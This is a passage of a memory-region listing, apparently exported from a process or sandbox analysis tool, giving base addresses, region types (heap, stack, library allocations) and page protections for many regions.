trusted library allocation
page read and write
220D2D80000
heap
page execute and read and write
1E680503000
trusted library allocation
page read and write
1628D49E000
trusted library allocation
page read and write
2E7D03E000
stack
page read and write
7FFD9B722000
trusted library allocation
page read and write
1E680887000
trusted library allocation
page read and write
1DE3D32F000
trusted library allocation
page read and write
1A06073000
stack
page read and write
177DA48F000
trusted library allocation
page read and write
15C8643A000
heap
page read and write
1709A9F6000
heap
page execute and read and write
14E0000
trusted library allocation
page read and write
3EE4A3F000
stack
page read and write
1D277BA0000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
20EE60D0000
heap
page read and write
1E6F7190000
heap
page execute and read and write
220EB1AC000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
1DE3D74E000
trusted library allocation
page read and write
1D277CD3000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1D279C06000
heap
page read and write
47510FF000
stack
page read and write
24FF2551000
trusted library allocation
page read and write
E8BC1F8000
stack
page read and write
2F11000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1D342DBA000
trusted library allocation
page read and write
1709AAB9000
trusted library allocation
page read and write
CCFB3CE000
stack
page read and write
20922D8A000
trusted library allocation
page read and write
1D987599000
trusted library allocation
page read and write
177DA491000
trusted library allocation
page read and write
1628B290000
heap
page read and write
2B6B2914000
heap
page read and write
1DE3D340000
trusted library allocation
page read and write
1D277B90000
heap
page read and write
1A0657B000
stack
page read and write
7FFD9B820000
trusted library allocation
page read and write
1DE3B3C1000
heap
page read and write
1E6F70F0000
heap
page execute and read and write
E8BBEFF000
stack
page read and write
CCFA3FE000
stack
page read and write
1D34AD53000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page execute and read and write
1E690001000
trusted library allocation
page read and write
24FF283A000
trusted library allocation
page read and write
244E1795000
heap
page read and write
1DE3B485000
heap
page read and write
2B6B2820000
heap
page read and write
1195000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
182A8E02000
heap
page read and write
1D34AE90000
heap
page execute and read and write
1E68010D000
trusted library allocation
page read and write
3EE4BBE000
stack
page read and write
1D279B35000
heap
page read and write
244E1630000
heap
page read and write
2B69A4D0000
heap
page execute and read and write
2BA7FF000
stack
page read and write
155860FC000
trusted library allocation
page read and write
7FFD9B700000
trusted library allocation
page execute and read and write
209231F9000
trusted library allocation
page read and write
1D279B41000
heap
page read and write
55BE000
stack
page read and write
5BBE000
stack
page read and write
8C89477000
stack
page read and write
CCFA739000
stack
page read and write
1D279AB7000
heap
page read and write
7FFD9B5F6000
trusted library allocation
page read and write
1E680882000
trusted library allocation
page read and write
1D9871AD000
trusted library allocation
page read and write
1DE3B160000
heap
page read and write
4750EFF000
stack
page read and write
24FE38F6000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
1D332E3C000
trusted library allocation
page read and write
DC0000
heap
page read and write
20EE6330000
heap
page read and write
7FFD9B872000
trusted library allocation
page read and write
8C8977B000
stack
page read and write
7FFD9B5F0000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
182A9020000
trusted library allocation
page read and write
1E6F6910000
heap
page read and write
20EE6073000
heap
page read and write
3067000
trusted library allocation
page read and write
2B6B2980000
heap
page execute and read and write
5D4C7BE000
stack
page read and write
155840C7000
heap
page read and write
1D279AD1000
heap
page read and write
1628D6CC000
trusted library allocation
page read and write
63D4D7E000
stack
page read and write
2E7CAFE000
stack
page read and write
2B698850000
trusted library section
page read and write
7FFD9B810000
trusted library allocation
page read and write
20ECE021000
trusted library allocation
page read and write
2BA47D000
stack
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
1D332D05000
trusted library allocation
page read and write
1DE55379000
heap
page read and write
516B2FE000
stack
page read and write
20ECDF21000
trusted library allocation
page read and write
220D13D0000
trusted library allocation
page read and write
7FFD9B6F2000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
7FFD9B6E0000
trusted library allocation
page execute and read and write
1386000
trusted library allocation
page execute and read and write
24FFA534000
heap
page read and write
CCFA27F000
stack
page read and write
1E6F6EF0000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
12D0000
trusted library allocation
page read and write
1D277CC4000
heap
page read and write
20921270000
trusted library allocation
page read and write
155864CE000
trusted library allocation
page read and write
24FE3D99000
trusted library allocation
page read and write
24FE2531000
trusted library allocation
page read and write
1D3327F0000
heap
page read and write
14C4000
trusted library allocation
page read and write
47514FE000
stack
page read and write
1DE554C0000
heap
page read and write
177D916E000
trusted library allocation
page read and write
1D333260000
trusted library allocation
page read and write
1510000
trusted library allocation
page execute and read and write
20ECE01E000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
1D332CFF000
trusted library allocation
page read and write
E8BD18E000
stack
page read and write
177D8CC1000
trusted library allocation
page read and write
1709AB51000
trusted library allocation
page read and write
20ECDA50000
trusted library allocation
page read and write
2E7CD78000
stack
page read and write
2B6B2B2D000
heap
page read and write
1709AA88000
trusted library allocation
page read and write
155864A3000
trusted library allocation
page read and write
CCFA7B8000
stack
page read and write
2B6989A0000
heap
page readonly
7FFD9B5C6000
trusted library allocation
page read and write
2E7DB4E000
stack
page read and write
220D1180000
heap
page read and write
63D4F38000
stack
page read and write
2B6AA7E9000
trusted library allocation
page read and write
15D4000
trusted library allocation
page read and write
17098FB0000
heap
page read and write
24FFAADA000
heap
page read and write
1D333562000
trusted library allocation
page read and write
2B69B0CD000
trusted library allocation
page read and write
17098E34000
heap
page read and write
209213D0000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
AFFE1CE000
stack
page read and write
1D279C45000
heap
page read and write
3EE4AB8000
stack
page read and write
20EE6250000
heap
page read and write
220D33A2000
trusted library allocation
page read and write
4071000
trusted library allocation
page read and write
1D34ADDA000
heap
page read and write
1DE3B3CA000
heap
page read and write
1559E128000
heap
page read and write
1E6F4E90000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
3071000
trusted library allocation
page read and write
177DA4B7000
trusted library allocation
page read and write
1628B260000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
3EE4DBB000
stack
page read and write
1D279AEA000
heap
page read and write
7FFD9B940000
trusted library allocation
page read and write
1D987126000
trusted library allocation
page read and write
1330000
heap
page read and write
1628D011000
trusted library allocation
page read and write
177D708A000
heap
page read and write
7FFD9B51D000
trusted library allocation
page execute and read and write
1D332D3E000
trusted library allocation
page read and write
7FFD9B722000
trusted library allocation
page read and write
7FFD9B544000
trusted library allocation
page read and write
2B6989E0000
trusted library allocation
page read and write
8C8A20D000
stack
page read and write
1628B2E0000
heap
page read and write
20921000000
heap
page read and write
8A24BFE000
unkown
page read and write
20922E1D000
trusted library allocation
page read and write
1D3332AF000
trusted library allocation
page read and write
1D333208000
trusted library allocation
page read and write
1E680048000
trusted library allocation
page read and write
1559E400000
heap
page read and write
1290000
trusted library allocation
page read and write
516BE8D000
stack
page read and write
1DE55600000
heap
page execute and read and write
1D330C23000
heap
page read and write
20922E20000
trusted library allocation
page read and write
24FE2490000
heap
page readonly
24FE3838000
trusted library allocation
page read and write
1559E0D4000
heap
page read and write
8A24F79000
stack
page read and write
7FFD9B870000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page execute and read and write
1A066FF000
stack
page read and write
63D5B8E000
stack
page read and write
1559E390000
heap
page read and write
1E68056C000
trusted library allocation
page read and write
20EE6227000
heap
page execute and read and write
8A25077000
stack
page read and write
170244E1000
heap
page read and write
2F2E000
stack
page read and write
1D333588000
trusted library allocation
page read and write
1345000
heap
page read and write
1360000
trusted library allocation
page read and write
1DE3B3A0000
heap
page read and write
24FE3DC0000
trusted library allocation
page read and write
7FFD9B540000
trusted library allocation
page read and write
14E7000
trusted library allocation
page execute and read and write
17098F90000
heap
page read and write
1D9870B1000
trusted library allocation
page read and write
177DA476000
trusted library allocation
page read and write
4750E73000
stack
page read and write
11EF000
heap
page read and write
1E6804AA000
trusted library allocation
page read and write
E8BC43E000
stack
page read and write
8A2600E000
stack
page read and write
2B69B0E6000
trusted library allocation
page read and write
1A0677E000
stack
page read and write
5A9E000
stack
page read and write
1A6A90E1000
heap
page read and write
14B3000
trusted library allocation
page execute and read and write
CCFA93E000
stack
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
120C000
heap
page read and write
1628D0F2000
trusted library allocation
page read and write
1628B328000
heap
page read and write
24FFAD42000
heap
page read and write
124E000
heap
page read and write
15583FB0000
heap
page read and write
2B69B59E000
trusted library allocation
page read and write
220E31E4000
trusted library allocation
page read and write
2B6988B0000
heap
page read and write
177D8CB0000
heap
page read and write
7FFD9B91C000
trusted library allocation
page read and write
7FFD9B540000
trusted library allocation
page read and write
1A6A90E1000
heap
page read and write
CCFA5F9000
stack
page read and write
1D333210000
trusted library allocation
page read and write
1390000
trusted library allocation
page read and write
47515FB000
stack
page read and write
177D91F6000
trusted library allocation
page read and write
13FE000
heap
page read and write
7FFD9B6C2000
trusted library allocation
page read and write
20ECC07D000
heap
page read and write
1D277C0F000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
7FFD9B650000
trusted library allocation
page execute and read and write
8A2620E000
stack
page read and write
220E3171000
trusted library allocation
page read and write
1628D139000
trusted library allocation
page read and write
17098DED000
heap
page read and write
20922D21000
trusted library allocation
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
2B69BE37000
trusted library allocation
page read and write
7FFD9B640000
trusted library allocation
page execute and read and write
2B69C308000
trusted library allocation
page read and write
1DE3D262000
trusted library allocation
page read and write
8C89578000
stack
page read and write
7FFD9B830000
trusted library allocation
page read and write
1D342CE1000
trusted library allocation
page read and write
5ABE000
stack
page read and write
1D986F10000
heap
page execute and read and write
1D9870E4000
trusted library allocation
page read and write
12D7000
trusted library allocation
page execute and read and write
25F80112000
trusted library allocation
page read and write
20ECE035000
trusted library allocation
page read and write
25F80001000
trusted library allocation
page read and write
209210BD000
heap
page read and write
15585F90000
heap
page execute and read and write
2E7CB7B000
stack
page read and write
1435000
heap
page read and write
170244D9000
heap
page read and write
7FFD9B616000
trusted library allocation
page execute and read and write
5384000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
1D98719D000
trusted library allocation
page read and write
516ACFF000
stack
page read and write
59BF000
stack
page read and write
7FFD9B870000
trusted library allocation
page read and write
CCF1E7D000
stack
page read and write
8A2608C000
stack
page read and write
1D985537000
heap
page read and write
14D6000
trusted library allocation
page execute and read and write
CCF207E000
stack
page read and write
1190000
heap
page read and write
2B69B47B000
trusted library allocation
page read and write
1558603E000
trusted library allocation
page read and write
1E6F71C0000
heap
page read and write
20923AEA000
trusted library allocation
page read and write
9FB0CF8000
stack
page read and write
1D33324A000
trusted library allocation
page read and write
155868A5000
trusted library allocation
page read and write
209213DB000
heap
page read and write
209213B7000
heap
page execute and read and write
2B69889E000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
2B6B2A90000
heap
page read and write
1E68011E000
trusted library allocation
page read and write
15584190000
heap
page read and write
1E680011000
trusted library allocation
page read and write
1E680085000
trusted library allocation
page read and write
24FE0AB8000
heap
page read and write
306E000
stack
page read and write
7FFD9B520000
trusted library allocation
page read and write
1D330E65000
heap
page read and write
63D4B7E000
stack
page read and write
1E680110000
trusted library allocation
page read and write
1D9871A3000
trusted library allocation
page read and write
11E3000
heap
page read and write
1558683B000
trusted library allocation
page read and write
1D333226000
trusted library allocation
page read and write
1D986F70000
heap
page read and write
1DE3B560000
heap
page read and write
209213B0000
heap
page execute and read and write
1DE3D2A5000
trusted library allocation
page read and write
1628CFE0000
heap
page execute and read and write
1340000
trusted library allocation
page read and write
9FB0D78000
stack
page read and write
20ECE0F3000
trusted library allocation
page read and write
56DE000
stack
page read and write
24FE3651000
trusted library allocation
page read and write
113E000
stack
page read and write
573E000
stack
page read and write
2EBB000
trusted library allocation
page execute and read and write
7FFD9B8A8000
trusted library allocation
page read and write
2B69C30D000
trusted library allocation
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
143D000
stack
page read and write
177D8B00000
trusted library allocation
page read and write
220D1390000
heap
page read and write
7FFD9B5F6000
trusted library allocation
page execute and read and write
2BA779000
stack
page read and write
244E1660000
heap
page read and write
1559E138000
heap
page read and write
2DEB2FD000
stack
page read and write
7FFD9B542000
trusted library allocation
page read and write
1D332CA0000
heap
page execute and read and write
20EE6348000
heap
page read and write
CCF9F62000
stack
page read and write
AFFF5CE000
stack
page read and write
7FFD9B524000
trusted library allocation
page read and write
182A90B0000
heap
page execute and read and write
7FFD9B5C6000
trusted library allocation
page read and write
1D330EB0000
heap
page readonly
7FFD9B700000
trusted library allocation
page execute and read and write
7FFD9B54D000
trusted library allocation
page execute and read and write
177D9148000
trusted library allocation
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
2BA27E000
stack
page read and write
25F80011000
trusted library allocation
page read and write
7FFD9B6F4000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
475117E000
stack
page read and write
1709AB47000
trusted library allocation
page read and write
D9B000
stack
page read and write
20ECE411000
trusted library allocation
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
7FFD9B6D1000
trusted library allocation
page read and write
177D9184000
trusted library allocation
page read and write
162F000
stack
page read and write
17098DEB000
heap
page read and write
7FFD9B720000
trusted library allocation
page read and write
14A0000
trusted library allocation
page read and write
1D3332AD000
trusted library allocation
page read and write
1DE3D2F3000
trusted library allocation
page read and write
1A060FF000
stack
page read and write
20ECDA70000
trusted library allocation
page read and write
2B6988EB000
heap
page read and write
182A9000000
trusted library allocation
page read and write
1628D6E7000
trusted library allocation
page read and write
2E7CCFD000
stack
page read and write
2F54000
trusted library allocation
page read and write
1628D3A2000
trusted library allocation
page read and write
1D985533000
heap
page read and write
5380000
trusted library allocation
page read and write
7FFD9B704000
trusted library allocation
page read and write
24FE0ABC000
heap
page read and write
63D4CFE000
stack
page read and write
9FB073F000
stack
page read and write
220D10E0000
heap
page read and write
24FE25A3000
trusted library allocation
page read and write
1D33357A000
trusted library allocation
page read and write
20921290000
trusted library allocation
page read and write
5D4BF72000
stack
page read and write
2B69B784000
trusted library allocation
page read and write
1D342CF0000
trusted library allocation
page read and write
8A24EFE000
stack
page read and write
11BB000
heap
page read and write
8C8907F000
stack
page read and write
7FFD9B710000
trusted library allocation
page execute and read and write
2B69889C000
heap
page read and write
7FFD9B843000
trusted library allocation
page read and write
8A254BC000
stack
page read and write
475147E000
stack
page read and write
209230C4000
trusted library allocation
page read and write
1D333281000
trusted library allocation
page read and write
8C8917E000
stack
page read and write
1D9854F0000
heap
page read and write
220D4DB6000
trusted library allocation
page read and write
1D277C9F000
heap
page read and write
25F804B2000
trusted library allocation
page read and write
475157F000
stack
page read and write
1D279AD8000
heap
page read and write
7FFD9B626000
trusted library allocation
page execute and read and write
1D279C4A000
heap
page read and write
1D9871AA000
trusted library allocation
page read and write
4750BCE000
stack
page read and write
1E6F4DD0000
heap
page read and write
1D332DFF000
trusted library allocation
page read and write
7FFD9B6FA000
trusted library allocation
page read and write
2B6AA552000
trusted library allocation
page read and write
7DF48B2D0000
trusted library allocation
page execute and read and write
25F80A42000
trusted library allocation
page read and write
25F804F3000
trusted library allocation
page read and write
7FFD9B660000
trusted library allocation
page execute and read and write
24FFAD72000
heap
page read and write
1D277EC0000
heap
page read and write
2B69A356000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
13BE000
stack
page read and write
1D279B35000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
24FFA9B0000
heap
page execute and read and write
2BA57B000
stack
page read and write
2093B05C000
heap
page read and write
20EE612D000
heap
page read and write
177D9139000
trusted library allocation
page read and write
20EDDF21000
trusted library allocation
page read and write
1709AAC5000
trusted library allocation
page read and write
1628D5AA000
trusted library allocation
page read and write
220D11C0000
heap
page read and write
7FFD9B52D000
trusted library allocation
page execute and read and write
1D985480000
heap
page read and write
220EB1A8000
heap
page read and write
1183000
trusted library allocation
page execute and read and write
7FFD9B8C0000
trusted library allocation
page read and write
CCFA9BC000
stack
page read and write
1D279AD8000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
20ECDFA4000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
1A0617F000
stack
page read and write
1559E13A000
heap
page read and write
15584090000
heap
page read and write
5D4C4FE000
stack
page read and write
1330000
heap
page read and write
56F4000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
2B698860000
heap
page read and write
1DE4D231000
trusted library allocation
page read and write
1D277CB5000
heap
page read and write
14B4000
trusted library allocation
page read and write
1E690011000
trusted library allocation
page read and write
1E680154000
trusted library allocation
page read and write
1242000
heap
page read and write
220D31F9000
trusted library allocation
page read and write
220D11C8000
heap
page read and write
7FFD9B710000
trusted library allocation
page read and write
17098DEF000
heap
page read and write
2B69B456000
trusted library allocation
page read and write
2D5F000
stack
page read and write
220D4CEC000
trusted library allocation
page read and write
1D3332B3000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
24FFABD0000
heap
page read and write
AFFF54E000
stack
page read and write
24FE4358000
trusted library allocation
page read and write
1D986EA0000
heap
page read and write
155840AB000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
1709AA9E000
trusted library allocation
page read and write
20ECE788000
trusted library allocation
page read and write
15583FF0000
heap
page read and write
24FE3494000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
1628CE00000
heap
page read and write
10F8000
stack
page read and write
1E6F71B3000
heap
page read and write
15F0000
heap
page read and write
7FFD9B87C000
trusted library allocation
page read and write
7FFD9B5DC000
trusted library allocation
page execute and read and write
20ECDF5E000
trusted library allocation
page read and write
15584220000
trusted library allocation
page read and write
24FE430E000
trusted library allocation
page read and write
AFFE5FD000
stack
page read and write
1D98719A000
trusted library allocation
page read and write
1E6800CF000
trusted library allocation
page read and write
1DE55664000
heap
page read and write
14A0000
heap
page read and write
15586829000
trusted library allocation
page read and write
63D4EB8000
stack
page read and write
2B6B2AB5000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
7FFD9B560000
trusted library allocation
page read and write
220D1120000
heap
page read and write
E8BC5BE000
stack
page read and write
2B69B441000
trusted library allocation
page read and write
8C890FF000
stack
page read and write
20ECDF31000
trusted library allocation
page read and write
1D985340000
heap
page read and write
170244E1000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
177D914C000
trusted library allocation
page read and write
1DE3DAA2000
trusted library allocation
page read and write
220D1270000
heap
page read and write
1E680001000
trusted library allocation
page read and write
1E6F68A0000
trusted library allocation
page read and write
AFFE183000
stack
page read and write
177D7355000
heap
page read and write
CCFB44D000
stack
page read and write
220D2C4D000
heap
page read and write
CCFA8BE000
stack
page read and write
177DA44D000
trusted library allocation
page read and write
1628B369000
heap
page read and write
15586449000
trusted library allocation
page read and write
177D91C2000
trusted library allocation
page read and write
2B69A55F000
trusted library allocation
page read and write
2B6B2877000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
AFFE9FF000
stack
page read and write
24FE2484000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
1709AF7B000
trusted library allocation
page read and write
1D333236000
trusted library allocation
page read and write
1A065F9000
stack
page read and write
220D1160000
trusted library allocation
page read and write
7FFD9B52B000
trusted library allocation
page read and write
8A251BE000
stack
page read and write
15596017000
trusted library allocation
page read and write
1DE3B3D0000
heap
page read and write
24FFAFA0000
heap
page read and write
1D279C43000
heap
page read and write
139B000
trusted library allocation
page execute and read and write
2F30000
heap
page read and write
15585FFF000
trusted library allocation
page read and write
1D987090000
heap
page execute and read and write
14DE000
heap
page read and write
24FE2450000
trusted library allocation
page read and write
2B6AA7D0000
trusted library allocation
page read and write
E8BBE7E000
unkown
page read and write
2B698A94000
heap
page read and write
1D277C10000
heap
page read and write
13ED000
heap
page read and write
20ECC170000
heap
page read and write
1D332DEB000
trusted library allocation
page read and write
15C0000
trusted library allocation
page read and write
3EE4B3B000
stack
page read and write
1D9871A0000
trusted library allocation
page read and write
20ECDA60000
heap
page readonly
1E6F7010000
heap
page read and write
1628CFF1000
trusted library allocation
page read and write
24FFAD28000
heap
page read and write
20922D57000
trusted library allocation
page read and write
516B17C000
stack
page read and write
1558681C000
trusted library allocation
page read and write
2093B0E5000
heap
page read and write
7FFD9B700000
trusted library allocation
page execute and read and write
1628DA80000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
2B698830000
heap
page read and write
15586710000
trusted library allocation
page read and write
8A25237000
stack
page read and write
5D4C579000
stack
page read and write
1E680902000
trusted library allocation
page read and write
FB7000
stack
page read and write
1DE55330000
heap
page read and write
1D333291000
trusted library allocation
page read and write
1628CC60000
trusted library allocation
page read and write
1A05DEE000
stack
page read and write
182A9030000
heap
page readonly
220D119E000
heap
page read and write
80C7BFE000
stack
page read and write
182A8E46000
heap
page read and write
1E6F6EE0000
heap
page execute and read and write
20ECDA90000
heap
page execute and read and write
24FFAD10000
heap
page read and write
20ECD980000
heap
page read and write
1D330B80000
heap
page read and write
E8BBF7E000
stack
page read and write
25F80490000
trusted library allocation
page read and write
2B6988A2000
heap
page read and write
2B6B2AAB000
heap
page read and write
1D277CB0000
heap
page read and write
1DE3D221000
trusted library allocation
page read and write
7FFD9B724000
trusted library allocation
page read and write
24FFAAFD000
heap
page read and write
3EE48FE000
stack
page read and write
177D8C60000
heap
page execute and read and write
1D332D7A000
trusted library allocation
page read and write
7FFD9B626000
trusted library allocation
page execute and read and write
9FB0E7B000
stack
page read and write
20ECDB20000
heap
page read and write
CCFA4FF000
stack
page read and write
3071000
trusted library allocation
page read and write
24FE4333000
trusted library allocation
page read and write
7FFD9B530000
trusted library allocation
page read and write
24FE3533000
trusted library allocation
page read and write
7FFD9B6DA000
trusted library allocation
page read and write
17099190000
heap
page read and write
3EE43D2000
stack
page read and write
7FFD9B5F0000
trusted library allocation
page execute and read and write
1D34AFF3000
heap
page read and write
1D279AD8000
heap
page read and write
2B698990000
trusted library allocation
page read and write
1D98748A000
trusted library allocation
page read and write
554F000
stack
page read and write
1D987460000
trusted library allocation
page read and write
177D9130000
trusted library allocation
page read and write
1320000
heap
page read and write
7FFD9B712000
trusted library allocation
page read and write
2B69B4E3000
trusted library allocation
page read and write
1440000
heap
page read and write
20ECC039000
heap
page read and write
4751279000
stack
page read and write
8A2533B000
stack
page read and write
2B6AA4E1000
trusted library allocation
page read and write
220D11C2000
heap
page read and write
1E68052E000
trusted library allocation
page read and write
7DF42F650000
trusted library allocation
page execute and read and write
1E68015B000
trusted library allocation
page read and write
7FFD9B730000
trusted library allocation
page read and write
24FE355F000
trusted library allocation
page read and write
1709AB4E000
trusted library allocation
page read and write
E8BD10C000
stack
page read and write
7DF42F660000
trusted library allocation
page execute and read and write
1D33358C000
trusted library allocation
page read and write
8A2618D000
stack
page read and write
1DE55427000
heap
page read and write
7FFD9B6F1000
trusted library allocation
page read and write
25F8053F000
trusted library allocation
page read and write
155864BE000
trusted library allocation
page read and write
1A062FF000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
1DE3D332000
trusted library allocation
page read and write
244E146B000
heap
page read and write
1E68086B000
trusted library allocation
page read and write
170244E1000
heap
page read and write
1D333217000
trusted library allocation
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
177DA140000
trusted library allocation
page read and write
1D3332B7000
trusted library allocation
page read and write
7FFD9B524000
trusted library allocation
page read and write
5D4C638000
stack
page read and write
1E6F4E70000
heap
page read and write
20921250000
trusted library allocation
page read and write
1DE3CDA0000
heap
page read and write
80C79FE000
stack
page read and write
2B69B50F000
trusted library allocation
page read and write
CCF1712000
stack
page read and write
7FFD9B820000
trusted library allocation
page read and write
24FE0C50000
heap
page read and write
182AAD80000
heap
page execute and read and write
24FE24A0000
trusted library allocation
page read and write
2F10000
heap
page execute and read and write
8A2610C000
stack
page read and write
1558408A000
heap
page read and write
2EB0000
trusted library allocation
page read and write
1D9870E1000
trusted library allocation
page read and write
7FFD9B55B000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
1DE3CD40000
trusted library allocation
page read and write
1D33321B000
trusted library allocation
page read and write
177D72C0000
trusted library allocation
page read and write
1628B3DB000
heap
page read and write
1D9857E0000
heap
page read and write
1628B2FE000
heap
page read and write
1DE3B409000
heap
page read and write
20932D86000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
1DE553BF000
heap
page read and write
2F60000
heap
page read and write
1D985780000
heap
page readonly
7FFD9B6F0000
trusted library allocation
page execute and read and write
1DE553C2000
heap
page read and write
7FFD9B740000
trusted library allocation
page read and write
1DE3D299000
trusted library allocation
page read and write
1709AA30000
heap
page execute and read and write
2E7CA7E000
stack
page read and write
1DE3D578000
trusted library allocation
page read and write
182A8DA0000
heap
page read and write
1D3332A9000
trusted library allocation
page read and write
7FFD9B956000
trusted library allocation
page read and write
1D9857E4000
heap
page read and write
1D3332B1000
trusted library allocation
page read and write
3EE477F000
stack
page read and write
523E000
stack
page read and write
12F7000
stack
page read and write
7FFD9B800000
trusted library allocation
page read and write
7FFD9B6FA000
trusted library allocation
page read and write
2B69A9AE000
trusted library allocation
page read and write
7FFD9B6F2000
trusted library allocation
page read and write
244E1790000
heap
page read and write
2E7CDBF000
stack
page read and write
170244D8000
heap
page read and write
57BE000
stack
page read and write
14D0000
trusted library allocation
page read and write
24FF2820000
trusted library allocation
page read and write
CCF1DF8000
stack
page read and write
1628D4DF000
trusted library allocation
page read and write
1628D6D4000
trusted library allocation
page read and write
20ECE7C0000
trusted library allocation
page read and write
182AAFC2000
trusted library allocation
page read and write
1D332CE1000
trusted library allocation
page read and write
4751FCE000
stack
page read and write
63D51BB000
stack
page read and write
15584240000
heap
page read and write
1558402C000
heap
page read and write
220D4857000
trusted library allocation
page read and write
1E68010A000
trusted library allocation
page read and write
CCFA6BC000
stack
page read and write
2B69B6F0000
trusted library allocation
page read and write
577E000
stack
page read and write
516B07A000
stack
page read and write
20EE6066000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
5D4C2FF000
stack
page read and write
1D330EA0000
trusted library allocation
page read and write
1DE5562F000
heap
page read and write
1D33329D000
trusted library allocation
page read and write
1D277CD3000
heap
page read and write
8A255BB000
stack
page read and write
516A9A5000
stack
page read and write
1E6808A6000
trusted library allocation
page read and write
8C893F9000
stack
page read and write
2B6B28D0000
heap
page read and write
1E68004B000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
7FFD9B6E0000
trusted library allocation
page execute and read and write
7FFD9B530000
trusted library allocation
page read and write
20ECE01B000
trusted library allocation
page read and write
20EE638A000
heap
page read and write
7FFD9B724000
trusted library allocation
page read and write
1D9871EA000
trusted library allocation
page read and write
2B6B2B95000
heap
page read and write
1D333279000
trusted library allocation
page read and write
20921105000
heap
page read and write
7FFD9B740000
trusted library allocation
page read and write
11B0000
heap
page read and write
24FF2531000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
589E000
stack
page read and write
182A90C0000
trusted library allocation
page read and write
7FFD9B513000
trusted library allocation
page execute and read and write
2B69C2C3000
trusted library allocation
page read and write
24FE35EE000
trusted library allocation
page read and write
1709A7E0000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
80C7CFE000
stack
page read and write
516BE0E000
stack
page read and write
1DE3D73D000
trusted library allocation
page read and write
AFFE877000
stack
page read and write
1D279AC6000
heap
page read and write
7FFD9B5C0000
trusted library allocation
page read and write
2D0F000
stack
page read and write
2DB0000
trusted library allocation
page execute and read and write
2092305C000
trusted library allocation
page read and write
1E680040000
trusted library allocation
page read and write
47511FE000
stack
page read and write
1628D0EF000
trusted library allocation
page read and write
10F7000
stack
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
2B69B477000
trusted library allocation
page read and write
1640000
heap
page read and write
1E680526000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
2BA2FE000
stack
page read and write
155860A4000
trusted library allocation
page read and write
9FB0F7F000
stack
page read and write
2E7C7DF000
stack
page read and write
1170000
trusted library allocation
page read and write
63D513F000
stack
page read and write
7FFD9B533000
trusted library allocation
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
20922D5F000
trusted library allocation
page read and write
20EDDF93000
trusted library allocation
page read and write
1D34AFFC000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
20ECDF66000
trusted library allocation
page read and write
20ECE7A1000
trusted library allocation
page read and write
1709AA41000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
24FF282A000
trusted library allocation
page read and write
1DE3DB1E000
trusted library allocation
page read and write
24FE0A6E000
heap
page read and write
2B698970000
trusted library allocation
page read and write
1E6F68B0000
heap
page readonly
7FFD9B970000
trusted library allocation
page read and write
E8BBBF3000
stack
page read and write
25F80149000
trusted library allocation
page read and write
20921350000
heap
page read and write
177DA49A000
trusted library allocation
page read and write
24FFABB0000
heap
page read and write
20ECC014000
heap
page read and write
1559E1A0000
heap
page read and write
209210DD000
heap
page read and write
1E6F4E75000
heap
page read and write
1D9854E0000
trusted library allocation
page read and write
177D7260000
heap
page read and write
CCF2ACE000
stack
page read and write
8A24E7E000
stack
page read and write
220D2DA0000
heap
page execute and read and write
2B69B572000
trusted library allocation
page read and write
12C6000
trusted library allocation
page execute and read and write
20EE6030000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
24FE3CB4000
trusted library allocation
page read and write
14DA000
trusted library allocation
page execute and read and write
7FFD9B7D0000
trusted library allocation
page read and write
1364000
trusted library allocation
page read and write
1A6A90D9000
heap
page read and write
3EE578E000
stack
page read and write
